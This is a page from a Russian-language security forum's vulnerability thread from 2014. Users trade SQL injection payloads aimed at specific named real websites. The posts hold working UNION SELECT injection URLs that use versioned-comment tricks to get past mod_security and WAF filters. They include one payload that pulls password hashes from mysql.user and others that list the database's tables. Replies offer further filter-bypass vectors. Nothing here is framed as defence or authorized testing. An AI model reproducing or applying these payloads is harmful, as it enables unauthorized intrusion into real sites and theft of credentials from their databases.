HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2390 из 2438 « Первая < 13901890229023402380 2386 2387 2388 2389 2390 2391 2392 2393 2394 2400 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23891  
Старый 16.11.2014, 16:25
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию
оо спасибо @HAXTA4OK. Скинула вопрос в личку, чтоб тут не спамить
 
Ответить с цитированием

  #23892  
Старый 16.11.2014, 19:04
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию
Может кто ещё подскажет?

Как фильтрацию дальше для from обойти? Лочат опять

Код:
Code:
http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!mysql.user.password*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/+/*!from*/+/*!mysql.user*/--+
 
Ответить с цитированием

  #23893  
Старый 17.11.2014, 09:26
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от vikler  
vikler said:
Может кто ещё подскажет?
Как фильтрацию дальше для from обойти? Лочат опять
Код:
Code:
http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!mysql.user.password*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/+/*!from*/+/*!mysql.user*/--+
www.vijphoto.com/index2.php?id=-73+/*!12345union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!table_name*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*//*!from*//*!information_schema.tables*/where table_schema=database()+--+l
 
Ответить с цитированием

  #23894  
Старый 17.11.2014, 09:58
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
Цитата:
Сообщение от vikler  
vikler said:
Может кто ещё подскажет?
Как фильтрацию дальше для from обойти? Лочат опять
Код:
Code:
http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!mysql.user.password*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/+/*!from*/+/*!mysql.user*/--+
http://www.vijphoto.com/index2.php?id=-73 /*!union*/ (select*from (select 1) a1 join (select 2) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11 join (select 12) a12 join (select 13) a13 join (select 14) a14 join (select 15) a15 join (select version()) a16 join (select 17) a17 join (select 18) a18 join (select 19) a19 join (select 20) a20 join (select 21) a21 join (select 22) a22 join (select 23) a23)

=)
 
Ответить с цитированием

  #23895  
Старый 27.11.2014, 16:41
erwap
Guest
Сообщений: n/a
Провел на форуме:
20084

Репутация: 0
По умолчанию
Код:
Code:
index.php?cat=test'
возвращает это:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' ORDER BY id DESC LIMIT 0, 9' at line 1

Когда пытаюсь крутить срабатывает mod_security

Обхожу так

Код:
Code:
http://execstyle.com/catPage.php?cat=test+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10+--+
После этого я виже весь свой запрос на экране

если поставить после test кавычку, возвращает следующее:

The used SELECT statements have a different number of columns
 
Ответить с цитированием

  #23896  
Старый 27.11.2014, 16:43
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию
Цитата:
Сообщение от erwap  
erwap said:
Код:
Code:
index.php?cat=test'
возвращает это:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' ORDER BY id DESC LIMIT 0, 9' at line 1
Когда пытаюсь крутить срабатывает mod_security
Обхожу так
Код:
Code:
http://execstyle.com/catPage.php?cat=test+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10+--+
После этого я виже весь свой запрос на экране
если поставить после test кавычку, возвращает следующее:
The used SELECT statements have a different number of columns
через error based всё вытягивает отлично
 
Ответить с цитированием

  #23897  
Старый 27.11.2014, 17:21
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от erwap  
erwap said:
Код:
Code:
index.php?cat=test'
возвращает это:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' ORDER BY id DESC LIMIT 0, 9' at line 1
Когда пытаюсь крутить срабатывает mod_security
Обхожу так
Код:
Code:
http://execstyle.com/catPage.php?cat=test+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10+--+
После этого я виже весь свой запрос на экране
если поставить после test кавычку, возвращает следующее:
The used SELECT statements have a different number of columns
Очень интересный WAF. Заинтересовала возможность вывода именно "union+select" методом.

Во-первых - там всего 1 поле.

Цитата:
Сообщение от None  
_http://execstyle.com/catPage.php?cat=test%27and(1)=1+order+by+2%23
Во-вторых, фильтруется связка union+select. Обходится стандартно.

Цитата:
Сообщение от None  
http://execstyle.com/catPage.php?cat=test%27and(1)=1%0Aunion(select())% 23
В-третьих, фильтруются какие либо текстовые или числовые данные, следующие за select. Всё, кроме спецсимволов.

Цитата:
Сообщение от None  
http://execstyle.com/catPage.php?cat=test%27and(1)=1%0Aunion(select(@@) )%23
Но селекция проходит при условия отсутствия union в запросе. Этим и объясняется возможность раскрутки Error-based вектором.

Думаю над путями обхода, люблю WAF)
 
Ответить с цитированием

  #23898  
Старый 27.11.2014, 22:15
erwap
Guest
Сообщений: n/a
Провел на форуме:
20084

Репутация: 0
По умолчанию
BigBear, напиши потом, как получиться
 
Ответить с цитированием

  #23899  
Старый 29.11.2014, 14:30
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
http://www.humidordiscount.com/cigar_clubs.php?selected_country=SG'+order+by+1+--+

Подтолкните на мыслю какую нибудь

Непонятно что и как фильтрует
 
Ответить с цитированием

  #23900  
Старый 29.11.2014, 14:42
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Цитата:
Сообщение от Br@!ns  
Br@!ns said:
http://www.humidordiscount.com/cigar_clubs.php?selected_country=SG'+order+by+1+--+
Подтолкните на мыслю какую нибудь
Непонятно что и как фильтрует
Там нету уязвимости.
 
Ответить с цитированием
Ответ
Страница 2390 из 2438 « Первая < 13901890229023402380 2386 2387 2388 2389 2390 2391 2392 2393 2394 2400 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ